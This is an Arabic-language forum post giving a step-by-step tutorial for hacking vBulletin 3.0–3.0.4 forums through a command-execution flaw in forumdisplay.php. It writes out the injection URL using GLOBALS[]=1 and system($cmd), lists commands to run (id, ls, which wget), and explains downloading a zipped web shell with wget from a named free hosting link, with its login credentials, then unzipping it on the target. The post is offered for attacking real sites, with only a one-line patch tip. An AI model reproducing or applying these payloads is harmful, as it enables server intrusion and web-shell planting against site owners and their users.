اختراق منتديات vbمن الاصدار 3.0الى 3.0.4ورفع الشل عليه

Admin المساهمات : 81 تاريخ التسجيل : 06/03/2011

السلام عليكم

سوف اشرح لكم اختراق منتديات الجيل الثالث من 3.0 الى 3.0.4 ورفع الشل واختراق الموقع

اولا :

اقرا العبارة التاليه

اقسم بالله لااخترق اي موقع او منتدى عربي الا موقع او منتدى يسب ديننا الاسلامي....

نبدأ

اولا شيء الثغرة من نوع commands execution يعني تطبيق اوامر اللينكس

ثانيا الكود المستخدم للثغرة هو

كود PHP:

forumdisplay.php?f=0&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=id

طبعا تلاحظون رقم (((صفر))) تقدر تغيرة للرقم بالنسبة للقسم اللي تدخلة يعني دخلت قسم رقم 8 تحط رقم 8 شيء مهم لازم تغيرة

طبعا لازم يكون اقل شيء يتصفح القسم اللي بتغير رقمة متصح واحد الظاهر لحد الان كل شيء مفهوم

((( id))) هذا هو الامر لنكس لمعرفة الصلاحيات

شروط الثغرة

يجب أن تكون زائر .

يجب أن تتمكن من رؤية المتواجدون بالأقسام .

يجب أن يكون هناك زائر واحد على الأقل في أحد الأقسام .

الشرط الأساسي وهو إعطاء قيمة 1 للمصفوفه GLOBALS[]

الحين يالله شغل قوقل

وبدأ

هذي هي الاصدارات المصابه

vbulletin version 3.0.0
vbulletin version 3.0.1
vbulletin version 3.0.2
vbulletin version 3.0.3
vbulletin version 3.0.4

نفرض لقيت منتدى مصابة حط كود الثغرة خلف رابط المنتدى مع تغيرررررر رقم للقسم اللي بتدخلة بشرط يكون فيه اقل شيء زائر شاهد الصورة

اختراق منتديات vbمن الاصدار 3.0الى 3.0.4ورفع الشل عليه 885522

اختراق منتديات vbمن الاصدار 3.0الى 3.0.4ورفع الشل عليه 885522

لا حظ حطيت بعد رابط المنتدى شوف الرقم 2 اللي بعد علامة يساوي هذا رقم القسم اللي دخلت

بعدين اظغط اوكي اذا طلع لك مثل اللي بالصورة فمعناها المنتدى مصاب وتقدر ترفع شل

اختراق منتديات vbمن الاصدار 3.0الى 3.0.4ورفع الشل عليه 885544

اختراق منتديات vbمن الاصدار 3.0الى 3.0.4ورفع الشل عليه 885544

اوكي الحين طلع لنا اننا مملك صلاحيات حلووو

الحين خلنا نغير

which wget ضعها مكان كلمة id الاخيرة في الكود شوفوا وش راح يعطينا في الصورة

اختراق منتديات vbمن الاصدار 3.0الى 3.0.4ورفع الشل عليه 4758

اختراق منتديات vbمن الاصدار 3.0الى 3.0.4ورفع الشل عليه 4758

اذا تبي تستعرض الباسوردات برضة pwd مكان id

الحين لو بغينا نستعرض الملفات كلها بهذا الكود بس نشيل كلمة id ونحط ls

كود PHP:

forumdisplay.php?f=1&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=ls

مثل ماتشوفون بالصورة طلع المجلدات

اختار اي مجلد وارفع علية الشل ونغير الامر id بالامر wget وبعدين نروح
نرفع شل على اي مساحة مجانية وناخذ رابط الشل ونحطة بعد كلمةwget وانا
رافعت لكم شل على لايكوس

http://members.lycos.co.uk/alqumacr...up/xxx10xxx. zip
طبعا كلمة المرور

criminalnet اليوزر
black الباسورد

نكمل

طبعا بيصير اخر الرابط اللي هو xxx10xxx.zip

الحين نفك الظغط عن الوين زيب بالامر unzip

يعني يكون كذا cmd=unzip xxx10xxx.zip

وبعدين يطلع لك صفحة بيضاء فيها رابط الشل

xxx10xxx.php

وبكذا خلاص بقي عليك تطبق اوامر اللينكس واوامر اللينكس متوفرة ومعروفة

الترقيع للثغرة رقيه للاصدار السابع افضل شيء

اختراقات موفقة
hano

» شرح طريقة اختراق المنتديات
» اختراق اى جهاز بدون ارسال اى شيء
» شرح ثغرة حلوه في منتديات MyBulletin
» شرح اقوى اختراق بالميتا اسبوليت فى المنتديات العربيه
» شرح[أوامر] جميع اوامر اختراق المواقع بالدوس